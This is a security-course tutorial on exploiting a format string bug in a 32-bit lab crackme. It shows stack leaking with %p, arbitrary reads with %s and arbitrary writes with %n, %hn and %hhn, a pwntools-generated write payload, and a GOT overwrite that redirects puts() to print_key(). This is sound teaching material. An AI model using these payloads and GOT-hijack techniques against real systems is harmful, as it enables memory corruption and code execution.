In this tutorial, we'll explore a powerful new class of bug, called a "format string vulnerability". Though it looks benign at first, this type of bug allows for arbitrary reads and writes in memory, and thus, arbitrary code execution.
We've finally eliminated the buffer overflow vulnerability in the crackme0x00 binary. Let's check out the new implementation!
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <string.h>
    #include <err.h>
    #include "flag.h"

    unsigned int secret = 0xdeadbeef;

    void handle_failure(char *buf) {
      char msg[100];
      snprintf(msg, sizeof(msg), "Invalid Password! %s\n", buf);
      printf(msg);
    }

    int main(int argc, char *argv[])
    {
      setreuid(geteuid(), geteuid());
      setvbuf(stdout, NULL, _IONBF, 0);
      setvbuf(stdin, NULL, _IONBF, 0);

      int tmp = secret;

      char buf[100];
      printf("IOLI Crackme Level 0x00\n");
      printf("Password:");

      fgets(buf, sizeof(buf), stdin);

      if (!strcmp(buf, "250382\n")) {
        printf("Password OK :)\n");
      } else {
        handle_failure(buf);
      }

      if (tmp != secret) {
        puts("The secret is modified!\n");
      }

      return 0;
    }
    $ checksec --file crackme0x00
    [*] '/home/lab05/tut05-fmtstr/crackme0x00'
        Arch:     i386-32-little
        RELRO:    Partial RELRO
        Stack:    Canary found
        NX:       NX enabled
        PIE:      No PIE (0x8048000)
As you can see, stack canaries and NX are both enabled, but the binary has only partial RELRO and is not position-independent (no PIE).
NOTE. These two lines disable buffering on stdout and stdin, so your input and output are never held back in a buffer. They're just there to make your life easier.

    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stdin, NULL, _IONBF, 0);
It works similarly to before, but when we type an incorrect password, it now produces an error message like this:
    $ ./crackme0x00
    IOLI Crackme Level 0x00
    Password:asdf
    Invalid Password! asdf
Unfortunately, this program is using printf() in a very insecure way.
    snprintf(msg, sizeof(msg), "Invalid Password! %s\n", buf);
    printf(msg);
Notice that after the first line above, msg will contain your input (the invalid password). If that input happens to contain a format specifier (%), the printf() in the second line will interpret it. This creates a security issue.
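Some common format specifiers are:
%p: print the argument as a pointer
%s: print the string that the argument points to
%d: print the argument as a signed decimal integer
%x: print the argument as a hexadecimal integer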
Let's try typing %p:
    $ ./crackme0x00
    IOLI Crackme Level 0x00
    Password:%p
    Invalid Password! 0x64
What's 0x64 in base-10? What do you think this represents in the code?
Let's go crazy by putting more %ps. How about 15?
    $ echo "1=%p|2=%p|3=%p|4=%p|5=%p|6=%p|7=%p|8=%p|9=%p|10=%p|11=%p|12=%p|13=%p|14=%p|15=%p" | ./crackme0x00
    Password:Invalid Password! 1=0x64|2=0x8048a40|3=0xffe1f428 ...
We seem to be able to see the values for 15 (or more -- we chose 15 arbitrarily) nonexistent arguments to the printf() call.
    1=0x64
    2=0x8048a40
    3=0xffe1f428
    4=0xf7f3ce89
    ...
    10=0x61766e49
    11=0x2064696c
    12=0x73736150
    13=0x64726f77
    14=0x3d312021
    15=0x327c7025
Where are those values coming from?
By the way, it's rather tedious to put lots of %ps to see these values. Luckily, printf-like functions provide a convenient way to access the n'th argument: %[nth]$p (e.g., %1$p = first argument). Let's try it:
    $ echo '%10$p' | ./crackme0x00
    IOLI Crackme Level 0x00
    Password:Invalid Password! 0x61766e49
As expected, the value printed matches the tenth one listed above.
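If you want to probe a whole range of positions at once, the numbered specifiers are easy to generate with a short script. This is only a sketch: the helper name positional_probes is made up for illustration, and it just builds the string that you would pipe into the binary. Keep in mind that buf and msg are both 100 bytes in the source above, so long probe strings get cut off.

```python
def positional_probes(first, last, conv="p"):
    """Build 'i=%i$p' probes for arguments first..last, separated by '|'.

    Hypothetical helper: it only constructs the text, it does not run the target.
    """
    return "|".join(f"{i}=%{i}${conv}" for i in range(first, last + 1))


# Probe arguments 10 through 15 (53 characters, short enough to fit in buf).
print(positional_probes(10, 15))
```

Writing the output to a file and redirecting it into ./crackme0x00 also sidesteps the shell-quoting issue with $.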
NOTE: Be sure to use single quotes (') rather than double quotes ("), to prevent your shell from trying to interpret the $ itself (e.g., like $PATH). If you do later need a format-string argument that includes interpolation, use " and backslash-escape the format-specifier $s (i.e., "\$").
Let's exploit this format-string bug to write an arbitrary value to an arbitrary memory address.
Have you noticed these interesting values in the output earlier?
    4=0xf7f3ce89
    ...
    10=0x61766e49 'Inva'
    11=0x2064696c 'lid '
    12=0x73736150 'Pass'
    13=0x64726f77 'word'
    14=0x3d312021 '! 1='
    15=0x327c7025 '%p|2'
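The ASCII annotations next to those values can be reproduced by packing each 32-bit value in little-endian order, which is the byte order this i386 binary uses in memory. A minimal sketch (the helper name as_ascii is just for illustration):

```python
import struct


def as_ascii(word):
    """Return the 4 bytes of a 32-bit value in little-endian (memory) order."""
    return struct.pack("<I", word)


# Values 10 through 15 from the %p output above.
leaked = [0x61766e49, 0x2064696c, 0x73736150, 0x64726f77, 0x3d312021, 0x327c7025]
recovered = b"".join(as_ascii(w) for w in leaked)
print(recovered)
```

Joined together, the six words spell out the start of msg, including the beginning of the input string that was typed.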
We can actually see our input string itself. We know that that string is stored on the stack, so it seems that what we put onto the stack is actually being interpreted as additional printf() arguments. What's going on?
When you invoke a printf()-like function, your arguments are passed via the stack, like this:
    printf("%s", a1, a2);

    [ ra ]
    [ s  ] --+   < 1st printf() argument: pointer to the format string
    [ a1 ]   |   < 2nd printf() argument: a1, the 1st format-string argument (aka %1$s)
    [ a2 ]   |   < 3rd printf() argument: a2, the 2nd format-string argument (aka %2$s)
    ["%s"] <-+   < the actual string data itself, on the stack
    [ ...]
Only three arguments are passed to printf() here, but printf() itself has no way of knowing that. So if the format string calls for higher-numbered arguments, printf() will faithfully read more data from the stack, since that's where those arguments would be if they did exist.
In this simple case, the third "argument" (i.e. %3$s) happens to be the format string data itself, so we have full control over its value! You can take advantage of this to read a few bytes from an arbitrary memory address, like this:
    printf("\xaa\xaa\xaa\xaa%3$s", a1, a2);

        [ ra ]
        [ s  ] --+
        [ a1 ]   |
        [ a2 ]   |
    +-- [aaaa] <-+
    |   [ ...]
    |
    V
    ?
This reads and prints a string (%s) at an address indicated by "the third argument," which we've set up to contain address 0xaaaaaaaa. By modifying the value of that address, we can make printf() read a string from anywhere.
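As a rough sketch of how such a payload could be assembled, the snippet below packs the address in little-endian order and appends a numbered %s. The helper name read_payload and the offset parameter are assumptions for illustration; the right offset depends on where your input lands on the stack. The check for 0x00 and 0x0a bytes reflects this particular binary, where the input passes through fgets() (which stops at a newline) and snprintf("%s") (which stops at a NUL byte).

```python
import struct


def read_payload(addr, offset):
    """Build '<addr, little-endian>%<offset>$s' as bytes.

    Hypothetical helper; `offset` is the argument position at which the
    packed address is expected to appear.
    """
    packed = struct.pack("<I", addr)
    if b"\x00" in packed or b"\n" in packed:
        # Such bytes would truncate the input before printf() ever sees it.
        raise ValueError("address contains a NUL or newline byte")
    return packed + f"%{offset}$s".encode()


# Reproduces the format string from the diagram above.
print(read_payload(0xaaaaaaaa, 3))
```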
In the case of the actual target binary, where is your input string located on the stack? That is, what value of N below results in this output?
    $ echo 'BBAAAA%N$p' | ./crackme0x00
    IOLI Crackme Level 0x00
    Password:Invalid Password! BBAAAA0x41414141
What happens if we then replace %p with %s? How does it crash?
You can examine the stack to understand how the format string bug works. As you can see, there are pointers to your input string AABBBB in the 3rd and 7th entries of the stack, and a copy of the value BBBB itself exists in the 15th entry.
    pwndbg> x/100i handle_failure
       0x804880b <handle_failure>:      push   ebp
       0x804880c <handle_failure+1>:    mov    ebp,esp
       0x804880e <handle_failure+3>:    sub    esp,0x88
       ...
       0x8048841 <handle_failure+54>:   push   eax
       0x8048842 <handle_failure+55>:   call   0x8048520 <printf@plt>

    pwndbg> b *0x8048842
    Breakpoint 1 at 0x8048842: file crackme0x00.c, line 14.

    pwndbg> r
    Starting program: /home/lab05/tut05-fmtstr/crackme0x00 AAAABBBBCCCC
    IOLI Crackme Level 0x00
    Password:AABBBB

    pwndbg> stack 30
       00:0000| esp 0xffd86b50 -> 0xffd86b78 <- 0x61766e49 ('Inva')
       01:0004|     0xffd86b54 <- 0x64 /* 'd' */
       02:0008|     0xffd86b58 -> 0x8048a40 <- dec ecx
       03:000c|     0xffd86b5c -> 0xffd86c18 <- 'AABBBB\n'
       04:0010|     0xffd86b60 -> 0xf7f0eeb9
       05:0014|     0xffd86b64 <- 0x1
       06:0018|     0xffd86b68 <- 0x0
       07:001c|     0xffd86b6c -> 0xffd86c18 <- 'AABBBB\n'
       08:0020|     0xffd86b70 -> 0x804a00c (_GLOBAL_OFFSET_TABLE_+12)
       09:0024|     0xffd86b74 -> 0xf7f14028 (_dl_fixup+184)
       0a:0028| eax 0xffd86b78 <- 0x61766e49 ('Inva')
       0b:002c|     0xffd86b7c <- 0x2064696c ('lid ')
       0c:0030|     0xffd86b80 <- 0x73736150 ('Pass')
       0d:0034|     0xffd86b84 <- 'word! AABBBB\n\n'
       0e:0038|     0xffd86b88 <- '! AABBBB\n\n'
    => 0f:003c|     0xffd86b8c <- 'BBBB\n\n'
You can check this yourself, too. If you try to print the 3rd or 7th argument as a string, it inserts a copy of your input:
    lab05@cs6265:~/tut05-fmtstr$ ./crackme0x00
    IOLI Crackme Level 0x00
    Password:AABBBB%3$s
    Invalid Password! AABBBBAABBBB%3$s

    lab05@cs6265:~/tut05-fmtstr$ ./crackme0x00
    IOLI Crackme Level 0x00
    Password:AABBBB%7$s
    Invalid Password! AABBBBAABBBB%7$s
But attempting to dereference the 15th stack entry causes a segmentation fault because that value is not a pointer, but rather the raw string "BBBB":
    lab05@cs6265:~/tut05-fmtstr$ ./crackme0x00
    IOLI Crackme Level 0x00
    Password:AABBBB%15$s
    Segmentation fault (core dumped)
What happens if you replace the "BBBB" with a valid address and try that again?
[Task] How can you use this to read the global variable "secret"?
You can find the address of secret using nm (or GDB or Ghidra):

    $ nm crackme0x00 | grep secret
    0804a050 D secret
printf() is very complex, and actually even supports a sort of "write" operation: the %n specifier writes the total number of bytes printed so far to a specified location.
    int len;
    printf("aaaa%nbbbb", &len);
    // `len` now contains 4, because 4 bytes had been printed so far at that point
Using this, and a similar trick to the arbitrary read, you can write to an arbitrary memory location like this:
    printf("\xaa\xaa\xaa\xaa%3$n", a1, a2);

        [ ra ]
        [ s  ] --+
        [ a1 ]   |
        [ a2 ]   |
    +-- [aaaa] <-+
    |   [ ...]
    |
    V
    ...
    *0xaaaaaaaa = 4 (i.e., 4 "\xaa"s have been printed so far)
With this idea, we clearly have full control over the address, but so far it seems we can only write the number "4" there. How can we write an arbitrary value?
To do that, we need to use another useful printf() format specifier: %[len]d (e.g., %10d). This prints an integer (we don't care which one) using at minimum len characters. This can be used to quickly raise the value that %n will write, without requiring an excessively long format string.
For example, to write 10 to 0xaaaaaaaa, you can print 6 more characters, like this:
    printf("\xaa\xaa\xaa\xaa%6d%3$n", a1, a2);
                            ^^^
    *0xaaaaaaaa = 10;
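You can sanity-check this arithmetic without touching the target, because Python's %-formatting applies the same minimum-width rule to %d as C's printf() does. The sketch below is only a model (the helper name printed_so_far is made up). It also shows a pitfall: the width is a minimum, so if the integer that %6d happens to consume has more than six characters, the count comes out larger than planned.

```python
def printed_so_far(prefix_len, width, value):
    """Characters emitted by a prefix of prefix_len bytes followed by
    %<width>d applied to `value` (modelled with Python's %-formatting)."""
    return prefix_len + len("%*d" % (width, value))


# Four address bytes plus a small integer padded to 6 characters: 10 in total.
print(printed_so_far(4, 6, 7))
# A 9-digit value ignores the minimum width, so the total becomes 13.
print(printed_so_far(4, 6, 134515264))
```

In a real exploit you do not choose the integer that gets printed, so it is worth checking how many digits the value in that argument slot actually has.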
And now you can write an arbitrary value to an arbitrary location. Almost.
Let's suppose you want to write the value 0xc0ffee to 0xaaaaaaaa. We'd prefer to avoid having to generate 12648430 bytes of output, so it'd be better to write this value byte-by-byte instead, which would involve far smaller numbers. You might think to do that with these operations:
    *(int *)0xaaaaaaaa = 0x000000ee;
    *(int *)0xaaaaaaab = 0x000000ff;
    *(int *)0xaaaaaaac = 0x000000c0;
But the problem is that once characters have been printed, they can't be "un-printed", so the values that we write can never decrease over time. So the writes would need to be done in this order:
    *(int *)0xaaaaaaac = 0x000000c0;
    *(int *)0xaaaaaaaa = 0x000000ee;
    *(int *)0xaaaaaaab = 0x000000ff;
But when you write the 4-byte integer 0x000000ee to 0xaaaaaaaa, you overwrite the byte 0xc0 at 0xaaaaaaac with a null byte. So that won't work.
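To see the clobbering concretely, here is a small simulation that replays those three 4-byte writes against a bytearray standing in for memory. It is a model only; the base address and the write_int helper are just for illustration.

```python
import struct

BASE = 0xaaaaaaaa      # address of the first simulated byte
mem = bytearray(8)     # 8 zeroed bytes standing in for memory at BASE


def write_int(addr, value):
    """Simulate a full %n: store `value` as a 4-byte little-endian int at addr."""
    struct.pack_into("<I", mem, addr - BASE, value)


# The writes in the only order that increasing counts allow.
for addr, value in [(0xaaaaaaac, 0xc0), (0xaaaaaaaa, 0xee), (0xaaaaaaab, 0xff)]:
    write_int(addr, value)

result = struct.unpack_from("<I", mem, 0)[0]
print(hex(result))
```

The final value is 0xffee rather than 0xc0ffee, because the later 4-byte writes zero out the 0xc0 byte that was stored first.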
There is a solution! There exist smaller-sized versions of %n:
%hn: writes the count as a short (2 bytes)
%hhn: writes the count as a char (1 byte)
That is, you can do this:
    printf("\xaa\xaa\xaa\xaa%6d%3$hhn", a1, a2);
    *(unsigned char*)0xaaaaaaaa = 10;
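This solves two problems at the same time. First, each write touches only a single byte, so it no longer clobbers neighboring bytes that were written earlier. Second, only the lowest 8 bits of the count are stored, so the written values no longer have to increase: after writing 0xff, printing 0xc1 more characters brings the count to 0x1c0, whose lowest byte is 0xc0.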
    *(unsigned char*)0xaaaaaaaa = 0xee;
    *(unsigned char*)0xaaaaaaab = 0xff;
    *(unsigned char*)0xaaaaaaac = 0xc0; // lowest 8 bits of 0x1c0
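The amount of padding needed before each %hhn follows directly from the wrap-around rule: it is the difference between the target byte and the current count, taken modulo 256. A minimal sketch, assuming the bytes are written in memory order and that the hypothetical parameter already_printed covers everything emitted before the first padding:

```python
def hhn_paddings(value, nbytes, already_printed=0):
    """Return how many extra characters to print before each %hhn so that
    the low byte of the running count equals each byte of `value`
    (little-endian order). A padding of 0 means no extra output is needed."""
    count = already_printed
    pads = []
    for byte in value.to_bytes(nbytes, "little"):
        pad = (byte - count) % 256
        pads.append(pad)
        count += pad
    return pads


# Writing 0xc0ffee as three bytes, starting from an empty output.
print(hhn_paddings(0xc0ffee, 3))
```

With nothing printed beforehand this gives 238, 17, and 193 characters, and 193 is exactly the 0xc1 step that carries the count from 0xff to 0x1c0.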
[Task] Can you overwrite the secret value with 0xc0ffee?
It's important to understand the core idea of how to construct a format string that writes an arbitrary value to an arbitrary location, but when you try to actually implement one, you'll quickly find that it's very tedious to do manually. Fortunately, pwntools provides a format string exploit generator for you.
    fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')
      offset (int): the first formatter's offset you control
      writes (dict): dict with addr, value {addr: value, addr2: value2}
      numbwritten (int): the number of bytes already written by printf()
Let's say we'd like to write 0xc0ffee to *0xaaaaaaaa, and we have control of the format string at the 4th param (i.e., %4$p), but we've already printed out 10 characters.
    $ python3 -c 'from pwn import*; print(fmtstr_payload(4, {0xaaaaaaaa: 0xc0ffee}, 10))'
    %228c%13$n%17c%14$hhn%193c%15$hhnaaa\xaa\xaa\xaa\xaa\xab\xaa\xaa\xaa\xac\xaa\xaa\xaa
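To convince yourself that this payload does what it claims, you can replay its directives by hand. The sketch below is a deliberately tiny model, not a printf() implementation: it understands only the two token shapes that appear in the output above (%<width>c and %<k>$n with an optional h or hh) and ignores everything else. The name simulate_writes is made up for illustration.

```python
import re

# Matches either a padded %c or a numbered %n / %hn / %hhn.
TOKEN = re.compile(r"%(\d+)c|%(\d+)\$(hh|h)?n")
WIDTH = {None: 4, "h": 2, "hh": 1}   # bytes stored by %n, %hn, %hhn


def simulate_writes(fmt, already_printed=0):
    """Return (argument index, bytes written, stored value) for each %n token."""
    count = already_printed
    writes = []
    for pad, arg, size in TOKEN.findall(fmt) and (m.groups() for m in TOKEN.finditer(fmt)):
        if pad is not None:
            count += max(int(pad), 1)   # %c always prints at least one character
        else:
            nbytes = WIDTH[size]
            writes.append((int(arg), nbytes, count % (1 << (8 * nbytes))))
    return writes


fmt = "%228c%13$n%17c%14$hhn%193c%15$hhn"
for arg, nbytes, value in simulate_writes(fmt, already_printed=10):
    print(arg, nbytes, hex(value))
```

The three writes store 0xee, 0xff, and 0xc0 through arguments 13, 14, and 15. Those indices are consistent with the payload layout: the directives take 33 bytes, the "aaa" pads them to 36 bytes (nine 4-byte words), so the three addresses start nine slots after offset 4.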
[Task] Is this similar to what you've come up with to write 0xc0ffee to the secret value? Please modify template.py to overwrite the secret value (if you succeed, the binary will print "The secret is modified!")!
Your task for today is to launch a control-hijacking attack using this format string vulnerability. The plan is simple: overwrite the GOT entry of puts() with the address of print_key(), so that when puts() is invoked, execution is actually redirected to print_key().
Here's an explanation of the GOT in case you haven't heard of it. The Global Offset Table ("GOT" for short) is a table in the process's memory which contains pointers to external functions (e.g., puts() or printf() in libc). Each entry corresponds to one function the compiler expects the binary to use.
When a dynamic loader such as ld initially loads the program, the GOT is (roughly speaking -- the actual behavior will be demonstrated shortly) filled with pointers to "_dl_runtime_resolve()":
    [&_dl_runtime_resolve] <- entry for printf()
    [&_dl_runtime_resolve] <- entry for puts()
    [&_dl_runtime_resolve] <- entry for scanf()
    [&_dl_runtime_resolve] <- entry for exit()
    ...
The first time the process attempts to call an external function through this table, _dl_runtime_resolve() is invoked. It obtains the real address of the desired function (i.e., the real address of puts() in libc), updates the table, and calls the function.
    [&_dl_runtime_resolve] <- entry for printf()
    [&puts]                <- entry for puts()
    [&_dl_runtime_resolve] <- entry for scanf()
    [&_dl_runtime_resolve] <- entry for exit()
    ...
After that, any further calls to the same external function (e.g., puts()) will therefore be immediately directed to the real address.
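If it helps, here is a toy model of that behavior in Python. It is purely conceptual: ToyProcess, libc_puts, and this print_key are invented stand-ins, and the real mechanism works on raw addresses rather than Python objects. It does capture the two properties that matter here, though: the resolver runs only on the first call, and whoever can overwrite a table entry decides where later calls go.

```python
def libc_puts(text):
    """Stand-in for the real puts() in libc."""
    return f"puts: {text}"


def print_key(text):
    """Hypothetical stand-in for the tutorial's print_key(); ignores its argument."""
    return "print_key reached"


class ToyProcess:
    def __init__(self):
        self.libc = {"puts": libc_puts}
        self.got = {"puts": None}     # None models "not resolved yet"
        self.resolver_calls = 0

    def call(self, name, *args):
        """Call an external function through the table, resolving it lazily."""
        if self.got[name] is None:
            self.resolver_calls += 1            # the resolver runs once...
            self.got[name] = self.libc[name]    # ...and patches the entry
        return self.got[name](*args)


proc = ToyProcess()
first = proc.call("puts", "hello")    # triggers resolution
second = proc.call("puts", "again")   # goes straight to libc_puts
proc.got["puts"] = print_key          # the attacker's overwrite
hijacked = proc.call("puts", "hello")
print(first, "|", second, "|", proc.resolver_calls, "|", hijacked)
```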
Let's see this in action. Here's the code snippet in main() that calls puts("The secret is modified!\n"):
    0x0804891b <+189>:   sub    esp,0xc
    0x0804891e <+192>:   push   0x8048a80
    0x08048923 <+197>:   call   0x8048590 <puts@plt>
Note that "puts@plt" is not the real "puts()" in libc -- 0x8048590 is in your code section (try vmmap 0x8048590). The real puts() from libc is located here:
    > x/4i puts
       0xf7db7b40 <puts>:     push   ebp
       0xf7db7b41 <puts+1>:   mov    ebp,esp
       0xf7db7b43 <puts+3>:   push   edi
       0xf7db7b44 <puts+4>:   push   esi
puts@plt means "puts at the Procedure Linkage Table (PLT)"; it points to one of the entries in the PLT:
    > pdisas 0x8048590-0x20
     > 0x8048570 <err@plt>         jmp    dword ptr [err@got.plt] <0x804a024>

       0x8048576 <err@plt+6>       push   0x30
       0x804857b <err@plt+11>      jmp    0x8048500 <0x8048500>

       0x8048580 <fread@plt>       jmp    dword ptr [fread@got.plt] <0x804a028>

       0x8048586 <fread@plt+6>     push   0x38
       0x804858b <fread@plt+11>    jmp    0x8048500 <0x8048500>

       0x8048590 <puts@plt>        jmp    dword ptr [puts@got.plt] <0x804a02c>

       0x8048596 <puts@plt+6>      push   0x40
       0x804859b <puts@plt+11>     jmp    0x8048500 <0x8048500>
       ...
As you can see, the PLT is a table containing (among other things) stub functions that each just jump to an address read from the GOT. puts@got.plt (0x804a02c) is the actual GOT entry for puts(), where the address is stored.
Let's follow this call (i.e., single-stepping into the call with stepi):
     > 0x8048590  <puts@plt>                 jmp    dword ptr [puts@got.plt] <0x804a02c>

       0x8048596  <puts@plt+6>               push   0x40
       0x804859b  <puts@plt+11>              jmp    0x8048500 <0x8048500>
        v
       0x8048500                             push   dword ptr [_GLOBAL_OFFSET_TABLE_+4] <0x804a004>
       0x8048506                             jmp    dword ptr [0x804a008] <_dl_runtime_resolve>
        v
       0xf7fb8dd0 <_dl_runtime_resolve>      push   eax
       0xf7fafe11 <_dl_runtime_resolve+1>    push   ecx
       0xf7fafe12 <_dl_runtime_resolve+2>    push   edx
The GOT entry for puts() (puts@got.plt) initially points to puts@plt+6, which is the next instruction after puts@plt. This ends up invoking _dl_runtime_resolve() with two parameters: a pointer to the start of the GOT itself (_GLOBAL_OFFSET_TABLE_+4), and a value indicating which function should be resolved (0x40, meaning puts()). Once _dl_runtime_resolve() is done, puts@got.plt will point to the real puts() in libc (0xf7e11b40 in this case).
Your goal is to use a format string to overwrite the GOT entry of puts() with another function's address, so that execution will be hijacked when puts() is called.
There are two challenges you'll encounter when doing this:
In order to reach the only call to puts() that occurs after your format string is parsed, you must also overwrite the secret value:
    if (tmp != secret) {
      puts("The secret is modified!\n");
    }
[Task] What should the "writes" param for fmtstr_payload() be?
Unfortunately, the size of the buffer is very limited, meaning it might not be able to fit the format strings for both write targets.
    void handle_failure(char *buf) {
      char msg[100];
      ...
    }
Do you remember the %hn/%hhn trick that lets you overwrite fewer bytes at a time, like one or two? That's where write_size comes into play:
    fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')
      write_size (str): must be byte, short or int. Tells if you want to write
                        byte by byte, short by short or int by int (hhn, hn or n)
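The write size is a trade-off. Smaller chunks mean more directives (and more address bytes) in the format string, while larger chunks mean fewer directives but potentially far more characters printed. The sketch below only illustrates how a 32-bit value splits into chunks for each setting; split_value is a made-up helper and says nothing about how pwntools implements this internally.

```python
CHUNK_BYTES = {"byte": 1, "short": 2, "int": 4}


def split_value(value, write_size):
    """Split a 32-bit value into little-endian chunks, one per %hhn/%hn/%n."""
    step = CHUNK_BYTES[write_size]
    raw = value.to_bytes(4, "little")
    return [int.from_bytes(raw[i:i + step], "little") for i in range(0, 4, step)]


for size in ("byte", "short", "int"):
    chunks = split_value(0xc0ffee, size)
    print(size, len(chunks), [hex(c) for c in chunks])
```

For 0xc0ffee this gives four 1-byte chunks, two 2-byte chunks, or a single 4-byte chunk, so the number of directives per target drops from four to two to one as the write size grows.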
Finally! Can you hijack the puts() invocation to redirect it to print_key() to get your flag for this tutorial?
[Task] In the given template.py, modify the payload to redirect the puts() invocation to print_key(), and get your flag!